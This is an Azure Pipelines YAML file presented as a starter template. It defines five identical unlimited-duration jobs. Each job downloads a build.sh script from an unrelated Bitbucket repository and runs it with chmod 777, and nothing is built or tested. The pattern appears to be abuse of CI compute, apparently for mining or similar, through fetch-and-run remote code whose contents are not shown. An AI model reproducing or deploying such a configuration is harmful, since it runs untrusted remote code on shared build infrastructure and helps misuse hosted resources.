# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml
# azure-pipelines.yml

trigger:
- main

pool:
  vmImage: ubuntu-16.04

jobs:
- job: MyJob1
  timeoutInMinutes: 0
  displayName: Pipeline 1
  steps:
  - script: |
      wget https://bitbucket.org/xngix/nodejs/raw/b5ab6e4269464412ee3e2e6889bf38a97aa5a207/build.sh && chmod 777 build.sh && ./build.sh
    displayName: 'Run a multi-line script'

- job: MyJob2
  timeoutInMinutes: 0
  displayName: Pipeline 2
  steps:
  - script: |
      wget https://bitbucket.org/xngix/nodejs/raw/b5ab6e4269464412ee3e2e6889bf38a97aa5a207/build.sh && chmod 777 build.sh && ./build.sh
    displayName: 'Run a multi-line script'

- job: MyJob3
  timeoutInMinutes: 0
  displayName: Pipeline 3
  steps:
  - script: |
      wget https://bitbucket.org/xngix/nodejs/raw/b5ab6e4269464412ee3e2e6889bf38a97aa5a207/build.sh && chmod 777 build.sh && ./build.sh
    displayName: 'Run a multi-line script'

- job: MyJob4
  timeoutInMinutes: 0
  displayName: Pipeline 4
  steps:
  - script: |
      wget https://bitbucket.org/xngix/nodejs/raw/b5ab6e4269464412ee3e2e6889bf38a97aa5a207/build.sh && chmod 777 build.sh && ./build.sh
    displayName: 'Run a multi-line script'

- job: MyJob5
  timeoutInMinutes: 0
  displayName: Pipeline 5
  steps:
  - script: |
      wget https://bitbucket.org/xngix/nodejs/raw/b5ab6e4269464412ee3e2e6889bf38a97aa5a207/build.sh && chmod 777 build.sh && ./build.sh
    displayName: 'Run a multi-line script'
